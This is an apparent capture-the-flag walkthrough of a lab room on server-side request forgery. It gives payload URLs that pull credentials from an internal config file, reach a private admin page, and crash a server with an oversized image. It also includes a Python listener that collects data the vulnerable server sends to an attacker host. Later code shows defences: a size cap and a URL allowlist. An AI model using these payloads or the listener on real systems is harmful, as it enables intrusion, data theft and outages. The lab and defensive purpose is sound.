SSRF
Discover the inner workings of SSRF and explore multiple exploitation techniques.
SSRF is a web application security vulnerability that allows an attacker to make the server issue unauthorised requests, on the server's behalf, to internal or external resources of the attacker's choosing. Because those requests originate from the server, they reach systems the attacker cannot reach directly, potentially leading to data leaks, service disruption, or even remote code execution.
Task 1 Introduction
Learning Objectives
Understanding the workings of SSRF
Practically testing various types of SSRF
A few important tools for exploitation
Key mitigation and defensive measures
Task 2 Anatomy of SSRF Attack
What is the average weighted impact for the SSRF vulnerability as per the OWASP Top 10?
The answer is in the OWASP Top 10 factors table for A10:2021 Server-Side Request Forgery; the average weighted impact is one of its columns, so a little reading is needed.
Task 3 Types of SSRF - Basic
Basic SSRF is a web attack technique where an attacker tricks a server into making requests on their behalf, often targeting internal systems or third-party services. By exploiting vulnerabilities in input validation, the attacker can gain unauthorised access to sensitive information or control over remote resources, posing a significant security risk to the targeted application and its underlying infrastructure.
Fairly straightforward: follow the instructions given in the room and you get the answers. The page fetches whatever the url parameter names, so change
http://hrms.thm/?url=localhost/copyright
to
http://hrms.thm/?url=localhost/config
as instructed. The server fetches localhost/config on your behalf and returns its contents, which hold the answers to the questions.

Answer the questions below
What is the username for the HRMS login panel?
[REDACTED]
Can be found after changing to config.
What is the password for the HRMS login panel?
[REDACTED]
Can be found after changing to config.
What is the admin URL as per the config file?
[REDACTED]
Can be found after changing to config.
What is the flag value after successfully logging in to the HRMS web panel?
[REDACTED]
Can be found after logging in with the credentials from the config file.

Task 4 Types of SSRF - Basic (Continued)
Follow the given instructions.
From the previous task we know that admin.php exists, but we cannot access it directly.
Check the HTML source: the dropdown passes a URL to an internal system and the server renders the response. The employee details are fetched from http://192.168.2.10/employees.php and http://192.168.2.10/salary.php.
Change one of those option values so the path is /admin.php (i.e. http://192.168.2.10/admin.php). 192.168.2.10 is a private, non-routable address; it is reachable only because the server makes the request for us.
Once the value is updated, select it in the dropdown and the admin page, with the flag, is rendered.

Answer the questions below
Is accessing non-routable addresses possible if a server is vulnerable to SSRF (yea/nay)?
yea
What is the flag value after accessing the admin panel?
[REDACTED]
Can be found after following the given steps.
Task 5 Types of SSRF - Blind
Blind SSRF refers to a scenario where the attacker can send requests to a target server, but they do not receive direct responses or feedback about the outcome of their requests. In other words, the attacker is blind to the server's responses.
This type of SSRF can be more challenging to exploit because the attacker cannot directly see the results of their actions. We will discuss its various examples.
Out-of-band SSRF is a technique where the attacker leverages a separate, out-of-band communication channel instead of directly receiving responses from the target server to receive information or control the exploited server.
This approach is practical when the server's responses are not directly accessible to the attacker.
This again is fairly straightforward. Follow all the instructions given.
How it works
Once again, log in to the dashboard and click on the Profile tab in the navigation bar. It redirects to http://hrms.thm/profile.php?url=localhost/getInfo.php, which displays a message that data is being sent.

What is happening here? When profile.php loads, it sends data to an external page named getInfo.php, which is probably used for analytics or logs. Because the destination is taken from the url parameter, an attacker can redirect that request to a server they control and collect additional information about the target for further exploitation or data theft.
Create server.py as instructed, with the code given in the room. That code receives whatever the request contains and saves it to a file named data.html on the attacking machine. Then open
http://hrms.thm/profile.php?url=http://ATTACKBOX_IP:8080
in the browser: the vulnerable server sends its data to your listener, which writes it to data.html. That file contains the server details (the answers below come from it) that can be used to launch further attacks.
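The listener below is an added example, not the server.py the room provides: it records every request the vulnerable profile.php sends to the attack box into data.html, and `demo_roundtrip` stands in for hrms.thm by posting a constructed phpinfo-style body to the listener on a loopback port. It assumes the leaked payload is HTML, so the body is appended verbatim; the "CONSTRUCTED-BUILD" value in the demo is made up for the test, not the room's answer.

```python
# Added example, not the room's server.py: an out-of-band listener that records
# every request the vulnerable profile.php sends to ATTACKBOX_IP:8080.
# Assumptions: the leaked payload is HTML (phpinfo-style), so the body is appended
# verbatim to data.html; demo_roundtrip below stands in for hrms.thm.
import os
import tempfile
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

LOG_FILE = "data.html"  # same file name the room uses


def format_record(client_ip, method, path, headers, body):
    """One captured request as an HTML fragment: request line, headers, raw body."""
    lines = [f"<h3>{method} {path} from {client_ip}</h3>", "<pre>"]
    lines.extend(f"{name}: {value}" for name, value in headers)
    lines += ["</pre>", body.decode("utf-8", errors="replace"), "<hr>"]
    return "\n".join(lines) + "\n"


class CaptureHandler(BaseHTTPRequestHandler):
    def _capture(self):
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length) if length > 0 else b""
        record = format_record(self.client_address[0], self.command, self.path,
                               list(self.headers.items()), body)
        with open(self.server.log_file, "a", encoding="utf-8") as fh:
            fh.write(record)
        self.send_response(200)
        self.send_header("Content-Length", "2")
        self.end_headers()
        self.wfile.write(b"ok")

    do_GET = do_POST = _capture

    def log_message(self, *args):  # keep the terminal quiet; data.html is the log
        pass


class CaptureServer(HTTPServer):
    def __init__(self, address, log_file=LOG_FILE):
        super().__init__(address, CaptureHandler)
        self.log_file = log_file


def start_listener(host="0.0.0.0", port=8080, log_file=LOG_FILE):
    """Serve in a background thread; the returned server's .server_address holds the bound port."""
    srv = CaptureServer((host, port), log_file)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def demo_roundtrip():
    """Stand-in for the victim: POST a constructed phpinfo-like row to the listener
    on a loopback port and return what landed in the log file."""
    with tempfile.NamedTemporaryFile(suffix=".html", delete=False) as tmp:
        path = tmp.name
    srv = start_listener("127.0.0.1", 0, path)
    host, port = srv.server_address
    try:
        body = b"<tr><td>PHP Extension Build</td><td>CONSTRUCTED-BUILD</td></tr>"  # constructed
        req = urllib.request.Request(f"http://{host}:{port}/getInfo.php", data=body, method="POST")
        with urllib.request.urlopen(req, timeout=5) as resp:
            resp.read()
    finally:
        srv.shutdown()
        srv.server_close()
    with open(path, encoding="utf-8") as fh:
        captured = fh.read()
    os.unlink(path)
    return captured


if __name__ == "__main__":
    # On the attack box: run this, then browse to profile.php?url=http://ATTACKBOX_IP:8080
    CaptureServer(("0.0.0.0", 8080)).serve_forever()
```

Run it on the attack box and open data.html in a browser afterwards; because the body is written as-is, a phpinfo-style leak renders as a table. The `<h3>` line records which method and path the victim used, which is itself useful: it tells you what profile.php appends to the URL you supplied.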
Answer the questions below
Does Out-of-band SSRF always include a technique in which an attacker always receives direct responses from the server (yea/nay)?
nay
What is the value for Virtual Directory Support on the PHP server per the logged data?
[REDACTED]
Can be found in data.html
What is the value of the PHP Extension Build on the server?
[REDACTED]
Can be found in data.html
Which type of SSRF doesn't give us a direct response or feedback?
Blind
Task 6 A Classic Example - Crashing the Server
One scenario in which an attacker could abuse SSRF is to crash the server or cause a denial of service for other hosts.
There are real-world instances (WordPress, CairoSVG) where attackers disrupted the availability of a system through SSRF. We will see how a complete server crash can be triggered through forged requests to a vulnerable server.
Again, very straightforward instructions.
How it works
Once we log in to the dashboard, we see a tab called Training in the navigation bar, which loads the training content for employees. Clicking it redirects to
http://hrms.thm/url.php?id=192.168.2.10/trainingbanner.jpg
, which shows the training content.

Notice that url.php loads external content and displays it here. What if we make it load something else? Try opening
http://hrms.thm/url.php?id=10.10.10.10
. It fetches and displays that target for you.

Now that we know the server is vulnerable to basic SSRF, let's look at the code of url.php (shown in the room) to make it crash the server. The code shows that url.php loads an image; if the image exceeds 100KB, it prints a memory outage message and throws an error. Let's try to crash the server by making it load an image larger than 100 KB. For convenience, such an image is already available; force the server to fetch it via
http://hrms.thm/url.php?id=192.168.2.10/bigImage.jpg
.
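The following is an added example, not the room's url.php: it places the unbounded "read everything, then check the size" shape beside a capped reader, and counts how many bytes each one actually pulls from the upstream before it gives up. The 100 KB figure is assumed to be the same cap the room's url.php applies; the byte string fed in is a constructed stand-in for bigImage.jpg.

```python
# Added example, not the room's url.php: the unbounded image load beside a capped one,
# with a counter showing how much of the body each version consumes before it bails.
# Assumption: 100 KB is the same cap the room's url.php applies.
import io

MAX_IMAGE_BYTES = 100 * 1024


class MemoryOutage(Exception):
    """Stands in for the room's 'memory outage' error."""


class ResponseTooLarge(Exception):
    pass


class CountingStream:
    """Wraps a byte source and counts how much the loader actually consumed."""
    def __init__(self, data):
        self._src = io.BytesIO(data)
        self.bytes_read = 0

    def read(self, n=-1):
        piece = self._src.read(n)
        self.bytes_read += len(piece)
        return piece


def load_image_unbounded(stream):
    """The vulnerable shape: read the whole body first, check the size afterwards.
    The memory is already spent by the time the check runs."""
    data = stream.read()
    if len(data) > MAX_IMAGE_BYTES:
        raise MemoryOutage("memory outage")
    return data


def load_image_capped(stream, declared_length=None, limit=MAX_IMAGE_BYTES, chunk=8192):
    """Refuse a declared oversize body before reading, then read in chunks and stop
    as soon as limit + 1 bytes have arrived, so memory use is bounded by `limit`."""
    if declared_length is not None and declared_length > limit:
        raise ResponseTooLarge(f"Content-Length {declared_length} exceeds {limit}")
    buf = bytearray()
    while True:
        piece = stream.read(min(chunk, limit + 1 - len(buf)))
        if not piece:
            return bytes(buf)
        buf.extend(piece)
        if len(buf) > limit:
            raise ResponseTooLarge(f"body exceeded {limit} bytes")


def measure(loader, size, **kwargs):
    """Feed `size` constructed bytes (a fake bigImage.jpg) to a loader; return
    (bytes consumed, exception class name or None)."""
    src = CountingStream(b"\xff" * size)
    try:
        loader(src, **kwargs)
        return src.bytes_read, None
    except (MemoryOutage, ResponseTooLarge) as exc:
        return src.bytes_read, type(exc).__name__


if __name__ == "__main__":
    for loader in (load_image_unbounded, load_image_capped):
        print(loader.__name__, measure(loader, 200 * 1024))
```

The point is the first number in each tuple: the unbounded loader has swallowed the entire 200 KB before it ever complains, which is what lets a forged request exhaust the server, while the capped loader stops one byte past the limit and never trusts a Content-Length header it has not verified by reading.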

Answer the questions below
What is the flag value after loading a big image exceeding 100KB?
[REDACTED]
Can be found after crashing the image server by following the instructions.
Task 7 Remedial Measures
Answer the questions below
Which of the following is the suggested approach while handling trusted URLs? Write the correct option only.
a) Filter out disallowed URLs
b) Maintaining an allowlist of trusted URLs
b
Since SSRF mainly exploits server-side requests, is it optional to sanitise the input URLs or parameters (yea/nay)?
nay
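As an added example that is not the HRMS application's own code, the block below puts the three approaches side by side: the "use whatever ?url= says" pattern exploited in Tasks 3 and 4, a string blocklist (option a) together with a loopback spelling it misses, and the allowlist of trusted URLs (option b) plus an opaque-key variant in which no URL crosses the trust boundary at all. It assumes the only legitimate upstream targets are the two 192.168.2.10 pages the dropdown uses.

```python
# Added example, not the HRMS application's code: the vulnerable "fetch whatever
# ?url= says" pattern (Tasks 3 and 4), a string blocklist (option a) and why it loses,
# and the allowlist approach (option b). Assumption: the only legitimate upstream
# targets are the two 192.168.2.10 pages the employee dropdown uses.
from urllib.parse import urlsplit

TRUSTED_URLS = {
    "http://192.168.2.10/employees.php",
    "http://192.168.2.10/salary.php",
}
# Stronger still: the client sends an opaque key and the server owns the URL table,
# so no URL ever crosses the trust boundary.
TRUSTED_BY_KEY = {
    "employees": "http://192.168.2.10/employees.php",
    "salary": "http://192.168.2.10/salary.php",
}


def vulnerable_target(url_param):
    """What the room's pages do: the client-supplied value becomes the fetch target,
    so localhost/config, 192.168.2.10/admin.php and ATTACKBOX_IP:8080 all get fetched."""
    return url_param


DENIED_SUBSTRINGS = ("localhost", "127.0.0.1")


def naive_blocklist_allows(url_param):
    """Option a, kept only to show why it loses: the set of 'bad' spellings is
    open-ended (127.1, 0x7f000001, [::1] and others all reach loopback)."""
    return not any(bad in url_param.lower() for bad in DENIED_SUBSTRINGS)


def canonical(url):
    """Normalise scheme/host/port/path, or return None unless the URL is an absolute
    http(s) URL carrying no credentials, query or fragment."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    if parts.username or parts.password or parts.query or parts.fragment:
        return None
    port = parts.port  # raises ValueError on a non-numeric port
    default = 80 if parts.scheme == "http" else 443
    netloc = parts.hostname if port in (None, default) else f"{parts.hostname}:{port}"
    return f"{parts.scheme}://{netloc}{parts.path or '/'}"


def is_trusted_url(url_param):
    """Option b: accept only an exact, canonicalised member of the allowlist."""
    try:
        return canonical(url_param) in TRUSTED_URLS
    except ValueError:
        return False


def url_for_key(key):
    """Opaque-key variant: returns the trusted URL or None; the key is never a URL."""
    return TRUSTED_BY_KEY.get(key)
```

Even with the allowlist, the fetch itself must not follow redirects (a trusted host that 302s to admin.php re-opens the hole) and the comparison must be on a parsed, canonical form rather than on the raw string, which is what `canonical` does. The opaque-key form is the cleanest answer to the Task 4 dropdown: the option values become "employees" and "salary", and there is nothing left in the page for an attacker to rewrite.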